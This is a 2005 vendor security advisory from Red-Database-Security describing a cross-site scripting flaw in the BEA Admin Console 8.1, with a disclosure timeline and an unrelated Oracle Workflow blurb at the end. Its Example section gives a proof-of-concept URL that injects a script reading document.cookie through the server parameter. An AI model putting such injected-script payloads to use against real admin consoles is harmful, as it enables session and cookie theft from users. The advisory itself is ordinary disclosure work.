Red-Database-Security GmbH is specialized in Oracle Security

Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published AlertsRSS Published Alerts
Upcoming AlertsRSS Published Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
Cross Site Scripting in BEA Admin console

Name Cross Site Scripting in BEA Admin Console
Systems Affected BEA Admin Console 8.1
Severity Low Risk
Category CSS/XSS
Vendor URL http://www.bea.com
Author Alexander Kornbrust (ak at red-database-security.com)
Date 25 Apr 2005 (V 1.01)
Advisory AKSEC2004-042


Details
One input field in the BEA Admin console is not properly checked. This causes a cross site scripting vulnerability.



Workarounds
None.


Example

http://localhost:8001/console/actions/jndi/JndiFramesetAction?server=%27%3cscript%3ealert%28document.cookie%29;%3c/script%3
emydomain%3AName%3Dmyserver%2CType%3DServer">


History
13-apr-2004 BEA secalert was informed
13-apr-2004 Bug confirmed
25-apr-2005 Advisory released


© 2005 by Red-Database-Security GmbH - last update 03-nov-2005

Oracle Workflow

Oracle Workflow is a complete business process management solution embedded in the Oracle database.

Its technology enables modeling, automation, and continuous improvement of business processes, routing information of any type according to user-defined business rules.

Oracle Workflow provides customers a scalable, production workflow system tuned for the high volumes associated with enterprise applications.